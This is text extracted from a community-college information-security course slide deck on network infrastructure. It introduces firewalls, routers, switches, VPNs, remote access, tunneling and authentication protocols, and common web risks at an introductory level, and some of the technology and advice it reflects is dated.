Download Slide 1

CIST 1601 Information Security Fundamentals
Chapter 3 Infrastructure and Connectivity
Collected and Compiled
By JD Willard
MCSE, MCSA, Network+,
Microsoft IT Academy Administrator
Computer Information Systems Technology
Albany Technical College
Understanding Infrastructure Security
Infrastructure security deals with the most basic aspect of how information flows and how work occurs in
your network and systems. This includes servers, networks, network devices, workstations, and the
processes in place to facilitate work.
Your network is composed of a variety of media and devices that both facilitate communications and
provide security.
Some of these devices (such as routers, modems, and PBX systems) provide external connectivity from
your network to other systems and networks.
Some of the devices (such as CD-Rs, disks, USB thumb drives, and tape) provide both internal archival
storage and working storage for your systems.
Networks are tied together using the Internet and other network technologies, thereby making them
vulnerable to any number of attacks.
To provide reasonable security, you must know how these devices work and how they
provide, or fail to provide, security.
Each time you add a device, change configurations, or switch technologies, you’re potentially altering the
fundamental security capabilities of your network.
The job of a security professional is to eliminate the obvious threats, to anticipate how the next creative
assault on your infrastructure might occur, and to be prepared to neutralize it before it happens.
A network is no more secure than its weakest node.
Working with Hardware Components
Network hardware
components include
physical devices such as
routers, servers, firewalls,
workstations, and switches.
From a security perspective
you must evaluate your
network from the
standpoint of each and
every device within it.
It cannot be overstated: The
complexity of most
networks makes securing
them extremely
Network Separation (2:52)
complicated.
To provide reasonable
security, you must evaluate
This network has Internet connections. Internet
every device to determine
connections expose your network to the highest
its unique strengths and
number of external threats. These threats can
vulnerabilities.
come from virtually any location worldwide.
Working with Software Components
Hardware exists to run software. The software is intended to make the
hardware components easy to configure and easy to support, however, that
software can also make the hardware easy to bypass.
Network infrastructure includes servers and workstations running operating
systems, routers, firewalls, and dedicated devices that have their own
communications and control programs. This situation leaves networks open to
attacks and security problems because many of these systems work
independently.
Many larger organizations have built a single area for network monitoring and
administrative control of systems called a Network Operations Center (NOC).
This centralization lets you see a larger overall picture of the network, and it lets
you take actions on multiple systems or network resources if an attack is under
way. Using a NOC makes it easier to see how an attack develops and to provide
countermeasures.
NOCs are expensive and require a great deal of support: factors beyond the
economy or scale of all but the largest businesses. After a NOC is developed and
implemented it must be constantly evaluated and changed as needed.
Understanding the Different Network
Infrastructure Devices - Firewalls
Firewalls, Routers, and Switches (7:47) All-in-one Security Appliances and Spam Filters
(2:36)
A firewall is a component placed on computers and networks to help eliminate
undesired access by the outside world. It can be composed of hardware, software, or a
combination of both.
Firewalls are the front line defense devices for networks that are connected to the
Internet.
A firewall protects hosts on a internal private network from attackers on a external public
network by:
Packet filtering
Port filtering
IP address filtering
A software firewall is a program that runs within an OS, such as Linux, Unix, or Windows.
With a software firewall, adding interfaces is as easy as adding and configuring another
NIC. It is easier to make configuration errors in a software firewall.
A hardware firewall is also referred to as an appliance firewall. Appliance firewalls are
often designed as stand-alone black box solutions that can be plugged in to a network
and operated with minimal configuration and maintenance. A hardware firewall is
purchased with a fixed number of interfaces available. Hardware firewalls outperform
and generally provide increased security over software firewalls.
Packet Filter Firewalls
Firewall Rules (7:57)
A packet-filtering firewall is typically a router and operate at the network layer of the
OSI model.
A packet filtering firewall only looks at a data packet to obtain the source and destination
addresses and the protocol and port used. This information is then compared to the
configured packet filtering rules to decide if the packet will be dropped or forwarded to
its destination. A packet filtering firewall only examines the packet header information,
not the data or payload.
Packet filters examine each incoming (and usually outgoing) packet then pass or discard
it based on network data packet fields:
Source and destination IP address
Specified port numbers
Specific protocols (TCP, UDP, ICMP)
Packet-filtering solutions are generally considered less-secure firewalls because they still
allow packets inside the network, regardless of communication pattern within the
session.
The packet-filtering firewall provides high performance.
Proxy Firewalls
Proxy firewalls serve as go-betweens for the network
and the Internet by processing requests received from
external networks and reprocessing them for use
internally.
This type of firewall has a set of rules that the packets
must pass to get in or out.
The primary security feature of a proxy firewall is that
it hides the client information.
It can be used to hide the internal addresses from the
outside would through Network Address Translation,
which does not allow the computers on the network
to directly access the Internet.
NAT hides a packet’s IP address before sending it
through another network. It is the only computer on a
network that communicates with mistrusted
computers.
If the organization is using the proxy server for both
Internet connectivity and web content caching, the
proxy server should be placed between the internal
network and the Internet, with access for users who
are requesting the web content.
A proxy-based firewall provides greater network
isolation than a stateful firewall.
A proxy firewall blocking network
access from external networks
Proxy Firewalls
Web Application Firewalls (3:05)
An application firewall is typically integrated into another type of firewall to
filter traffic that is traveling at the Application layer of the OSI model.
The proxy function can occur at either the application level or the circuit level.
An application firewall creates a virtual circuit between the firewall clients.
Each protocol has its own dedicated portion of the firewall that is concerned
only with how to properly filter that protocol’s data.
This type of server is advanced and must know the rules and capabilities of the
protocol used.
A unique application-level proxy server must exist for each protocol supported.
Unlike a circuit-level firewall, an application-level firewall does not examine the
IP address and port of the data packet.
An application-level proxy firewall is most detrimental to network performance
because it requires more processing per packet.
Proxy Firewalls
A proxy firewall typically uses two
network interface cards (NICs). This
type of firewall is referred to as a
dual-homed firewall.
Dual-homed computers have two
NICs installed, each connected to a
separate network.
A dual-homed firewall has two
network interfaces.
One interface connects to the public
network, usually the Internet.
The other interface connects to the
private network.
The forwarding and routing function
should be disabled on the firewall to
ensure that network segregation
occurs.
A dual-homed firewall segregating two
networks from each other
Stateful Inspection Firewalls
Stateful inspection is also referred to as stateful packet filtering.
A stateful-inspection firewall, a combination of all types of firewalls, is suited for main
perimeter security. Stateful-inspection firewalls can thwart port scanning by closing off
ports until a connection to the specific port is requested.
Stateful inspection firewalls work at the Network Layer to provide an additional layer of
security and also monitor the state of each connection.
Most of the devices used in networks don’t keep track of how information is routed or
used. After a packet is passed, the packet and path are forgotten. In stateful packet
filtering records are kept using a state table that tracks every communications channel.
Stateful inspections provide additional security, especially in connectionless protocols
such as UDP and ICMP.
Denial-of-service (DoS) attacks present a challenge because flooding techniques are used
to overload the state table and effectively cause the firewall to shut down or reboot.
Stateful and circuit-level proxy firewalls, while slower than packet-filtering firewalls, offer
better performance than application-level firewalls.
Firewalls and DMZs
Firewalls can be used to create demilitarized
zones (DMZs).
A DMZ is a network segment placed between
an internal (private) network and an external
(public) network, such as the Internet.
Typically, either one or two firewalls are used to
create a DMZ.
A DMZ implemented with one firewall
connected to a public network, a private
network and a DMZ segment is cheaper to
implement than a DMZ implemented with two
firewalls.
A DMZ with a firewall on each end is typically
more secure than a single-firewall DMZ.
The main objective for the placement of
firewalls is to allow only traffic that the
organization deems necessary and provide
notification of suspicious behavior.
Hubs
Physical Port Security (5:24)
Hubs act as a central connection point for network devices on one
network segment. Hubs are used to extend the length of network
beyond the cable’s maximum segment distance. They work at the
Physical layer of the OSI model.
Hubs are network devices that allow many hosts to inter-communicate
through the usage of physical ports. This makes hubs central connectivity
devices and prone to being attacked. Traffic sent to one port is
regenerated it to all other ports.
Hubs do not provide data isolation between endpoint ports, allowing any
node to observe data traffic to and from all other nodes on the same
device providing attackers with access to inspect network traffic for
interception of user credentials, security encryption traffic, and other
forms of sensitive transmitted data.
Hubs are considered highly unsecure.
Modems
A modem is a hardware device that connects the digital signals from a computer to the
analog telephone line. It allows these signals to be transmitted longer distances than are
possible with digital signals.
The word "modem" is an amalgam of the words "modulator" and "demodulator," which
are the two functions that occur during transmission.
Modems present a unique set of challenges from a security perspective.
Leaving modems open for incoming calls with little to no authentication for users dialing
in can be a clear security vulnerability in the network. For example, war-dialing attacks
take advantage of this situation. War-dialing is the process by which an automated
software application is used to dial numbers in a given range to determine whether any
of the numbers are serviced by modems that accept dial-in requests.
Setting the callback features to have the modem call the user back at a preset number
and using encryption and firewall solutions will help keep the environment safe from
attacks.
Monitor computers that have modems to check whether they have been compromised
Check for software updates for computers that have modems.
Remove all unnecessary modems from computers.
Remote Access Services
Remote access servers (RAS) allow clients to use dial-up
connections and network technologies to access servers and
internal networks. RAS connections are achieved through dialup DSL, VPNs, cable modems and ISDN.
Remote Access (2:50)
Client systems with a modem can connect using normal dialup connections to a properly equipped remote-access service
server, which functions as a gateway through which the
remote user may access local resources or gain connectivity to
the Internet.
The RAS environment is vulnerable to public PBX
infrastructure vulnerabilities, RAS software bugs, buffer
overflows, and social engineering. You should apply vendor
security patches as soon as they are available to protect
against RAS software bugs. Social engineering and the public
PBX infrastructure is a common method used by intruders to
access your RAS environment.
Typical methods of securing remote access servers:
Implementing a strong authentication method or two-factor
authentication
Limiting which users are allowed to dial-in and limiting the dialin hours
Implementing account lockout and strict password policies
Implementing a real-time alerting system
Allowing dial-in only and forcing callback to a preset number
are strategies for securing remote access servers (RAS).
A RAS connection between a remote
workstation and a Windows server
Routers
Routers enable connectivity between two or more networks and can
connect multiple network segments into one network.
Routers operate at the Network Layer (Layer 3) by using IP addresses to
route packets to their destination along the most efficient path.
Routers store information about network destinations in routing tables.
Routing tables contain information about known hosts on both sides of
the router.
Routers can be configured in many instances to act as packet-filtering
firewalls. When configured properly, they can prevent unauthorized
ports from being opened.
Routers are the first line of defense and should therefore be configured
to forward only traffic that is authorized by the network administrator.
Access entries can be specified to allow only authorized traffic and deny
unauthorized traffic.
Methods for securing routers:
Routers should be kept in locked rooms
You should use complex passwords for administrative consoles
Routers should be kept current with the latest available vendor security
patches
Configure access list entries to prevent unauthorized connections and
routing of traffic
Use monitoring equipment to protect connection points and devices
Secure Router Configuration (2:38)
Routers
Routers, in conjunction with a CSU/DSU) are also used to translate LAN to WAN framing. Such routers are
referred to as border routers. Border routers decide who can come in and under what conditions.
Dividing internal networks into two or more subnets is a common use for routers.
Routers can also be connected internally to other routers, effectively creating autonomouslzones. This type
of connection keeps local network traffic off the network backbone and provides additional security
internally.
Routers establish routing tables. A router contains information about the networks connected to it and
where to send requests if the destination is unknown. These tables grow as connections are made through
the router.
Routers communicate routing information using three standard protocols:
Routing Information Protocol (RIP) is a simple protocol that is part of the TCP/IP protocol suite. Routers that use
RIP routinely broadcast the status and routing information of known routers. RIP also attempts to find routes
between systems using the smallest number of hops or connections.
Border Gateway Protocol (BGP) allows groups of routers to share routing information.
Open Shortest Path First (OSPF) allows routing information to be updated faster than with RIP.
Switches
Switch Port Security and 802.1X (5:35)
Switches can be used to connect multiple LAN segments. Switches operate at the Data
Link layer of the OSI model (Layer 2), using the MAC address to send packets to their
destination.
Switches create virtual circuits between systems in a network. These virtual circuits are
somewhat private and reduce network traffic when used. Virtual circuits are more
difficult to examine with network monitors.
Only packets destined for the computer on a particular port of a switch can be seen.
With computers connected through a switch, eventually any individual computer would
be exposed to only traffic destined for that particular computer or for all computers.
Therefore, any port would be able to see only traffic destined for it and broadcasts.
Switches are used to create security segments on a LAN through the implementation of
VLANs.
VLAN Management (3:44)
Physical access control to the networking closet is critical to protect switched networks
against any exposed supervisory ports that can be exploited by an attacker.
Methods for securing switches:
Switches should be kept in locked rooms
You should use complex passwords for administrative consoles
Switches should be kept current with the latest a
Use monitoring equipment to protect connection points and device available vendor security
patches
Telecom/PBX Systems
Many modern PBX (private branch exchange) systems integrate voice
and data onto a single data connection to your phone service provider.
These connections are made using existing network connections such
as a T1 or T3 network.
A PBX provides a connection to the public switched telephone network
(PSTN) and provides telephone extensions for employees. A PBX is a
programmable telephone switch that is typically located on a
company’s premises. A PBX can usually be remotely administered.
For years, PBX-type systems have been targeted by hackers, mainly to
get free long-distance service. The vulnerabilities that phone networks
are subject to include social engineering, long-distance toll fraud, and
breach of data privacy.
To protect a PBX from hacker attacks:
Make sure the PBX is in a secure area
Limit the number of entry points
Change default passwords
Only allow authorized maintenance
Remote PBX administration should require user names and passwords
The telephone number used to remotely administer a PBX should be
unlisted
Block all toll numbers and limit long-distance calling
Implement a PBX password change and audit policy
Many times, hackers can gain access to the phone system via social
engineering because this device is usually serviced through a remote
maintenance port.
A modern digital PBX system
integrating voice and data onto a
single network connection
Virtual Private Networks
VPNs are used to make
connections between private
networks across a public
network.
VPN connections provide a
mechanism for the creation of
a secured “tunnel” through a
public network such as the
Internet using a tunneling
protocol, such as L2TP or PPTP.
These connections are not
guaranteed to be secure
unless, and an encryption
system, such as IPSec, is used.
VPN Concentrators (2:06)
VPN Server in Front of the Firewall
With the VPN server in front of the firewall
attached to the Internet you need to add packet
filters to the Internet interface that only allow VPN
traffic to and from the IP address of the VPN
server's interface on the Internet.
For inbound traffic, when the tunneled data is
decrypted by the VPN server it is forwarded to the
firewall, which employs its filters to allow the traffic
to be forwarded to intranet resources.
Because the only traffic that is crossing the VPN
server is traffic generated by authenticated VPN
clients, firewall filtering in this scenario can be used
to prevent VPN users from accessing specific
intranet resources.
Because the only Internet traffic allowed on the
intranet must go through the VPN server, this
approach also prevents the sharing of File Transfer
Protocol (FTP) or Web intranet resources with nonVPN Internet users.
For the Internet interface on the VPN server, configure
the input and output filters using the Routing and
Remote Access snap-in.
VPN Server Behind the Firewall
More commonly, the firewall is connected to the
Internet and the VPN server is another intranet
resource connected to a DMZ. The VPN server has an
interface on the DMZ and an interface on the intranet.
In this approach, the firewall must be configured with
input and output filters on its Internet interface to allow
the passing of tunnel maintenance traffic and tunneled
data to the VPN server. Additional filters can allow the
passing of traffic to Web servers, FTP servers, and other
types of servers on the DMZ.
The firewall does not have the encryption keys for each
VPN connection so it can only filter on the plaintext
headers of the tunneled data, meaning that all
tunneled data passes through the firewall. No problem,
because the VPN connection requires an authentication
process that prevents unauthorized access beyond the
VPN server.
When you deploy a VPN gateway in its own DMZ behind
the external firewall, you receive the following benefits:
The firewall can protect the VPN gateway
The firewall can inspect plain text from the VPN
Internet connectivity does not depend on the VPN
gateway
In this deployment, the following drawbacks are
experienced:
The firewall will need special routes to the VPN gateway
configured
Roaming client support is hard to achieve
For the Internet interface on the firewall, input
and output filters need to be configured using the
firewall's configuration software.
Wireless Access Points
To build a wireless network:
On the client side, you need a wireless NIC
On the network side, you need a wireless
access point (WAP)
A wireless access point (WAP) is a low-power
transmitter/receiver, also known as a
transceiver, which is strategically placed for
access.
The portable device and the access point
communicate using one of several
communications protocols, including IEEE
802.11 (also known as Wireless Ethernet).
Wireless offers mobile connectivity within a
campus, a building, or even a city.
Wireless communications, although
convenient, can also be less than secure.
While many WAPs now ship with encryption
on, you will still want to verify that this is the
case with your network.
A wireless portal being used to
connect a computer to a company
network. Notice that the portal
connects to the network and is
treated like any other connection
used in the network.
Monitoring and Diagnosing Networks
Network Monitors
Network monitors, otherwise called sniffers, were
originally introduced to help troubleshoot network
problems.
Examining the signaling and traffic that occurs on a
network requires a network monitor.
Network monitors are now available for most
environments, and they’re effective and easy to use.
Today, a network-monitoring system usually consists of
a PC with a NIC (running in promiscuous mode) and
monitoring software.
Microsoft Network Monitor is a packet analyzer. It
enables capturing, viewing, and analyzing network data
and deciphering network protocols. It can be used to
troubleshoot network problems and applications on the
network.
The monitoring software is menu driven, easy to use,
and has a big help file.
The traffic displayed by sniffers can become overly
involved and require additional technical materials
which you can find on the Internet for free.
With a few hours of work, most people can make
network monitors work efficiently and use the data
they present.
Microsoft Network Monitor
Monitoring and Diagnosing Networks
Intrusion Detection Systems
An IDS (Intrusion Detection System) is a hardware device with software that monitors
events in a system or network to identify when intrusions are taking place. IDS are
designed to analyze data, identify attacks, and respond to the intrusion.
An IDS can run on network devices and on individual workstations. You can configure
the IDS to monitor for suspicious network activity, check systems logs, perform
stateful packet matching, and disconnect sessions that are violating your security
policy.
An IDS is used to protect and report network abnormalities to a network administrator
or system. It works with audit files and rule-based processing to determine how to act
in the event of an unusual situation on the network.
IDSs are different from firewalls in that firewalls control the information that gets in
and out of the network, whereas IDSs can identify unauthorized activity. IDSs are also
designed to catch attacks in progress within the network, not just on the boundary
between private and public networks.
If the firewall were compromised, the IDS would notify you based on rules it’s
designed to implement.
In the event the firewall is compromised or penetrated, the IDS can react by disabling
systems, ending sessions, and even potentially shutting down your network.
The main types are a host-based IDS system and network IDS system.
With a host-based IDS system, software runs on the host computer system
to monitor machine logs, system logs, and how applications inter-operate.
With a network IDS, the IDS checks for network traffic and traffic patterns
that could be indicative of attacks such as port scan and denial-of-service
attacks.
Log Analysis (2:33)
An IDS and a firewall working
together to secure a network
Securing Workstations and Servers
Workstations are particularly vulnerable in a network. Workstations communicate using
services such as file sharing, network services, and applications programs. Many of these
programs have the ability to connect to other workstations or servers. These connections
are potentially vulnerable to interception and exploitation.
The process of making a workstation or a server more secure is called platform
hardening. The process of hardening the operating system is referred to as OS hardening.
Platform hardening procedures can be categorized into three basic areas:
Remove unused software, services, and processes from the workstations (for example, remove the
server service from a workstation). These services and processes may create opportunities for
exploitation.
Ensure that all services and applications are up-to-date, including available service and security
packs, and configured in the most secure manner allowed. This may include assigning passwords,
limiting access, and restricting capabilities.
Minimize information dissemination about the operating system, services, and capabilities of the
system. Many attacks can be targeted at specific platforms once the platform has been identified.
Many operating systems use default account names for administrative access. If at all possible, these
should be changed. During a new installation of Windows Vista or Windows XP, the first user created
is automatically added to the administrators group. Windows Vista then goes one step further and
automatically disables the actual administrator account once another account belonging to the
administrators group has been created.
Understanding Mobile Devices
Mobile devices, including pagers and personal
digital assistants (PDAs) use either RF signaling
or cellular technologies for communication. If
the device uses the Wireless Application
Protocol (WAP), the device in all likelihood
doesn’t have security enabled. Several levels of
security exist in the WAP protocol:
Anonymous authentication, which allows
virtually anyone to connect to the wireless portal
Server authentication, which requires the
workstation to authenticate against the server
Two-way (client and server) authentication,
which requires both ends of the connection (client
and server) to authenticate to confirm validity
Many new wireless devices are also capable of
using certificates to verify authentication.
The Wireless Session Protocol (WSP) manages
the session information and connection between
the devices.
The Wireless Transaction Protocol (WTP)
provides services similar to TCP and UDP for WAP.
The Wireless Datagram Protocol (WDP) provides
the common interface between devices.
Wireless Transport Layer Security (WTLS) is the
security layer of the Wireless Application Protocol.
A mobile environment using WAP
security. This network uses both
encryption and authentication to
increase security.
Understanding Remote Access
Using Point-to-Point Protocol
Point-to-Point Protocol PPP offers multiple protocol
support including AppleTalk, IPX, and DECnet, and is widely
used today as a transport protocol for dial-up connections.
PPP is a protocol for communicating between two points
using a serial interface, provides service at layer 2 of the
OSI model. PPP can handle both synchronous and
asynchronous connections.
PPP provides no security. PPP is primarily intended for dialup connections and should never be used for VPN
connections.
PPP works with POTS, Integrated Services Digital Network
(ISDN), and other faster connections such as T1.
PPP does not provide data security, but it does provide
authentication using Challenge Handshake Authentication
Protocol (CHAP). CHAP can be used to provide on-demand
authentication within an ongoing data transmission.
A dial-up connection using PPP works well because it isn’t
common for an attacker to tap a phone line. You should
make sure all your PPP connections use secure channels,
dedicated connections, or dial-up connections.
PPP using a single B channel on
an ISDN connection. In the case
of ISDN, PPP would normally use
one 64Kbps B channel for
transmission.
Understanding Remote Access
Working with Tunneling Protocols
Tunneling protocols add a capability to the
network:
The ability to create tunnels between networks that
can be more secure, support additional protocols, and
provide virtual paths between systems.
The three primary tunneling protocols are PPTP
(Point-to-Point Tunneling Protocol), L2TP (Layer 2
Tunneling Protocol) and L2F (Layer 2 Forwarding
protocol).
Working with Tunneling Protocols
Point-to-Point Tunneling Protocol
Point-to-Point Tunneling Protocol (PPTP) was created by Microsoft to work with the
Point-to-Point (PPP) protocol to create a virtual Internet connection so that networks can
use the Internet as their WAN link.
PPTP is known as a tunneling protocol because the PPTP protocol dials through the PPP
connection, which results in a secure connection between client and server.
This connectivity method creates a virtual private network (VPN), allowing for private
network security. In effect PPTP creates a secure WAN connection using dial-up access.
PPTP supports encapsulation in a single point-to-point environment. PPTP encapsulates
and encrypts PPP packets. This makes PPTP a favorite low-end protocol for networks.
The negotiation between the two ends of a PPTP connection is done in the clear. Once
the negotiation is performed, the channel is encrypted. A packet-capture device, such as
a sniffer, that captures the negotiation process can potentially use that information to
determine the connection type and information about how the tunnel works.
Working with Tunneling Protocols
Layer 2 Forwarding
L2F was created by Cisco as a method of creating tunnels primarily for dial-up
connections. L2F is similar in capability to PPP and should not be used over WANs. L2F
does provide authentication, but it does not provide encryption.
Layer 2 Tunneling Protocol
Layer Two Tunneling Protocol (L2TP) is an enhancement of PPTP that can be used
between LANs and can also be used to create a VPN.
L2TP is primarily a point-to-point protocol.
Relatively recently, Microsoft and Cisco agreed to combine their respective tunneling
protocols into one protocol: the Layer Two Tunneling Protocol (L2TP). L2TP is a hybrid of
PPTP and L2F.
L2TP supports multiple network protocols and can be used in networks besides TCP/IP.
L2TP works over IPX, SNA, and IP.
L2TP isn’t secure, and you should use IPSec with it to provide encryption of the data.
L2TP operates at the Data Link layer of the OSI model and uses UDP for sending packets
as well as for maintaining the connection. L2TP uses UDP port number 1701.
Working with Tunneling Protocols
Secure Shell
Secure Shell (SSH) is a type of tunneling protocol that allows access to remote systems in a secure manner.
SSH was originally designed for UNIX systems. SSH is a program that allows connections to be secured by
encrypting the session between the client and the server. SSH also provides security equivalent programs
such as Telnet, FTP, and many of the other communications-oriented programs under UNIX.
SSH transmits both authentication information and data securely during terminal connections with UNIX
computers. SSH uses port 22.
Internet Protocol Security
IPSec (Internet Protocol Security) is not a tunneling protocol, but it is used in conjunction with tunneling
protocols to provide network security. IPSec is oriented primarily toward LAN-to-LAN connections, rather
than dial-up connections.
IPSec can be used to digitally sign headers and to encrypt and encapsulate packets. IPSec provides both
authentication and encryption, and is regarded as one of the strongest security standards.
When the Authentication Header (AH) protocol is used, IPSec digitally signs packet headers, and when the
Encapsulating Security Payload (ESP) is used, IPSec encrypts packets.
Working with Tunneling Protocols
IPSec can be used with many different protocols besides TCP/IP, and it has two
modes of security:
Tunneling mode is used for VPNing over an unsecured public network. In
Tunneling mode, packets are encapsulated within other packets and both the
payload and message headers are encrypted. Two routers that require secure
communications should use IPSec in tunnel mode to encrypt packets.
Transport mode is used only when the data portion needs to be encrypted over
owner-controlled networks like LAN. In Transport mode, only the payload is
encrypted. When transport mode is used, packets are not encapsulated.
Working with RADIUS
Remote Authentication Dial-In User Service (RADIUS) is a
mechanism that provides centralized remote user
authentication, authorization, and accounting.
RADIUS and TACACS (5:46)
The centralized authentication, authorization, and accounting
features of RADIUS allow central administration of all aspects
of remote login. The accounting features allow administrators
to track usage and network statistics by maintaining a central
database.
A RADIUS server can be managed centrally, and the servers
that allow access to a network can verify with a RADIUS
server whether or not an incoming caller is authorized. In a
large network with many connections, this allows a single
server to perform all authentications.
A RADIUS server acts as either the authentication server or a
proxy client that forwards client requests to other
authentication servers. The initial network access server,
which is usually a VPN server or dial-up server, acts as a
RADIUS client by forwarding the VPN or dial-up client’s
request to the RADIUS server. RADIUS is the protocol that
carries the information between the VPN or dial-up client,
the RADIUS client, and the RADIUS server.
RADIUS encrypts only the password in the access-request
packet, from the client to the server. The remainder of the
packet is unencrypted.
RADIUS uses UDP transport.
A RADIUS server communicating with an ISP to allow
access to a remote user. Notice that the remote server is
functioning as a client to the RADIUS server. This allows
centralized administration of access rights.
TACACS/+
Terminal Access Controller Access Control System (TACACS) is a client/serveroriented environment, and it operates in a similar manner to RADIUS.
Extended TACACS (XTACACS) replaced the original and combined authentication
and authorization with logging to enable auditing.
Although RADIUS performs in much the same manner, TACACS+ is used almost
exclusively by Cisco. RADIUS is more of a generic standard used by many
different companies. TACACS+ is gaining ground, however.
The most current method or level of TACACS is TACACS/+. TACACS/+ allows
credentials to be accepted from multiple methods, including Kerberos.
TACACS+ provides authentication, authorization, and accounting (AAA).
TACACS relies on TCP over port 49.
Securing Internet Connections
Working with Ports and Sockets
TCP/IP establishes connections and circuits using a
combination of the IP address and a port.
A port is an interface that is used to connect to a device.
Sockets are a combination of the IP address and the port.
The socket identifies which application will respond to the
network request.
For example, if you attempt to connect to a remote system
with the IP address 192.168.0.100, which is running a
website, you’ll use port 80 by default. The combination of
these two elements gives you a socket; 192.168.0.100:80.
IP is used to route the information through the network.
The four layers of TCP/IP encapsulate the information into a
valid IP packet that is then transmitted across the network.
The figure to the right illustrates the key components of a
TCP packet requesting the home page of a website. The
destination port is the port data is sent to. In the case of a
web application, the data for port addresses would both
contain 80. The data field contains the value Get/. This
value requests the home or starting page from the web
server. In essence, this command or process requested the
home page of the site 192.168.0.100 port 80. The data is
formed into another data packet that is passed down to IP
and sent back to the originating system on port 1024.
The connections to most services using TCP/IP are based on
this port model.
Securing Internet Connections
Working with E-Mail
The most common e-mail systems use the following
protocols, which use TCP for session establishment:
Simple Mail Transport Protocol SMTP is a mail delivery
protocol that is used to send e-mail between an e-mail client
and an e-mail server as well as between e-mail servers. SMTP
uses port 25.
Post Office Protocol POP is a newer protocol that relies on
SMTP for message transfer to receive e-mail. POP3, the newest
version of POP, allows messages to be transferred from the
waiting post office to the e-mail client. The current POP3
standard uses port 110.
Internet Message Access Protocol IMAP is the newest player
in the e-mail field, and it’s rapidly becoming the most popular.
Like POP, IMAP has a store-and-forward capability. IMAP allows
messages to be stored on an e-mail server instead of being
downloaded to the client. It also allows messages to be
downloaded based on search criteria. The current version
IMAP 4 uses port 143.
Each of these web services is offered in conjunction with
web-enabled programs such as Flash and Java. These
services use either a socket to communicate or a program
that responds to commands through the browser. If your
browser can be controlled by an application, your system is
at great risk of attack. Servers are also vulnerable to this
issue because they must process requests from browsers for
information or data.
The process of transferring an
e-mail message.
Securing Internet Connections
Working with the Web
There are two common ways to provide secure connections
between a web client and a web server:
Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are
the most widely used cryptographic protocols used to convey
information between a web client and a server. The SSL protocol
uses an encryption scheme between the two systems. The client
initiates the session, the server responds, indicating that encryption
is needed, and then they negotiate an appropriate encryption
scheme. TLS is a newer protocol that merges SSL with other
protocols to provide encryption. TLS supports SSL connections for
compatibility, but it also allows other encryption protocols, such as
Triple DES, to be used. SSL/TLS uses port 443 and TCP for
connections.
HTTP Secure (HTTP/S) is a protocol that is used for secure
connections between two systems that use the Web. It protects the
connection, and all traffic between the two systems is encrypted.
HTTP/S uses SSL or TLS for connection security, and it uses port 443
and TCP for connections.
Securing Internet Connections
ActiveX
ActiveX is a technology that was implemented by Microsoft.
ActiveX allows customized controls, icons, and other features to increase
the usability of web enabled systems.
ActiveX uses a method called authenticode for security. Authenticode is
a type of certificate technology that allows ActiveX components to be
validated by a server.
ActiveX runs on the client.
Web browsers can be configured so that they require confirmation to
accept an ActiveX control. However, many users don’t understand these
confirmation messages when they appear, and they automatically accept
the components.
Automatically accepting an ActiveX component or control creates the
opportunity for security breaches on a client system when the control is
used because an ActiveX control contains programming instructions that
can contain malicious code or create vulnerabilities in a system.
Securing Internet Connections
Buffer Overflows
Perhaps the most popular method of privilege escalation is a bufferoverflow attack. Buffer overflows cause disruption of service and lost
data.
Buffer overflows occur when an application receives more data than it is
programmed to accept.
This situation can cause:
An application to terminate. The termination may leave the system
sending the data with temporary access to privileged levels in the attacked
system.
The overwriting of data or memory storage.
A denial of service due to overloading the input buffer’s ability to cope
with the additional data.
Or the originator can execute arbitrary code, often at a privileged level.
A buffer overflow is targeted toward an individual machine.
Securing Internet Connections
Common Gateway Interface
Common Gateway Interface (CGI) is an older form of scripting that was
used extensively in early web systems.
CGI scripts could be used to capture data from a user using simple forms.
CGI scripts are not widely used in new systems and are being replaced by
Java, ActiveX, and other technologies.
The CGI script ran on the web server, and it interacted with the client
browser.
Vulnerabilities in CGI are the result of its inherent ability to do what it is
told. If a CGI script is written to wreak havoc (or carries extra code added
to it by a miscreant) and it is executed, your systems will suffer.
The best protection against any weaknesses is to not run applications
written in CGI.
Securing Internet Connections
Cookies
Cookies are text files that a browser maintains on the user's hard disk. They store
information on a Web client for future sessions with a Web server.
A cookie will typically contain information about the user. It is used to provide a
persistent, customized Web experience for each visit and to track a user’s browser
habits. A cookie can contain the history of a client to improve customer service.
A tracking cookie is a particular type of permanent cookie that stays around, whereas a
session cookie stays around only for the particular visit to a web-site.
The danger to maintaining session information is that sites may access cookies stored in
the browser’s cache that may contain sensitive information identifying the user or
allowing access to secured sites.
The information stored in a cookie is not typically encrypted and might be vulnerable to
hacker attacks.
The best protection is to not allow cookies to be accepted. Almost every browser offers
the option to enable or disable cookies. If you enable them, you can usually choose
whether to accept/reject all or only those from an originating server.
Securing Internet Connections
Cross-site scripting (XSS)
Cross-site Scripting (12:36)
Cross-site scripting (XSS) is when a website redirects the client’s browser
to attack yet another site.
XSS is a type of security vulnerability typically found in Web applications
that allows code injection by hackers into the Web pages viewed by
other users. It is used to trick a user into visiting a site and having code
execute locally.
XSS poses the most danger when a user accesses a financial
organization’s site using his or her login credentials. The problem is not
that the hacker will take over the server. It is more likely that the hacker
will take over the client’s session. This will allow the hacker to gain
information about the legitimate user that is not publicly available.
The best protection against cross-site scripting is to disable the running
of scripts.
Securing Internet Connections
Input Validation
Anytime a user must supply values in a session, validation of the
data entered should be done.
Many vendors, however, have fallen prey to input validation
vulnerabilities within their code. In some instances, empty
values have been accepted, while others have allowed privilege
escalation if certain backdoor passwords were used.
The best protection against input validation vulnerabilities is for
developers to follow best practices and always validate all
values entered.
As an administrator, when you learn of an input validation
vulnerability with any application on your system, you should
immediately stop using it until a patch has been released and
installed.
Securing Internet Connections
Java Applets
A Java applet is a small, self-contained Java script that is downloaded from a server to a
client and then run from the browser. The client browser must have the ability to run Java
applets in a virtual machine on the client. Java applets are used extensively in web servers
today, and they are popular tools used for website development.
Signed applets are similar to unsigned Java applets-with one key difference:
Unsigned Java applets use sandboxes to enforce security. A sandbox protects the system from
malicious software by enforcing the execution of the application within the sandbox and preventing
access to the system resources outside the sandbox. The concept of a Web script that runs in its own
environment and cannot interfere with any other process is known as a sandbox.
A signed applet does not run in the Java sandbox, and it has higher system access capabilities. Signed
applets are not usually downloaded from the Internet. This type of applet is usually provided by inhouse or custom-programming efforts. These applets can also include a digital signature to verify
authenticity. If the applet is verified as authentic, it will be installed. Users should never download a
signed applet unless they are sure that the provider is trusted.
Errors in the Java virtual machine that runs in the applications may allow some applets to run outside
of the sandbox. When this occurs, the applet is unsafe and may perform malicious operations.
From a user’s standpoint, the best defense is to make certain you run only applets from reputable sites
you’re familiar with. From an administrator’s standpoint, you should make certain programmers
adhere to programming guidelines when creating the applets.
Securing Internet Connections
JavaScript
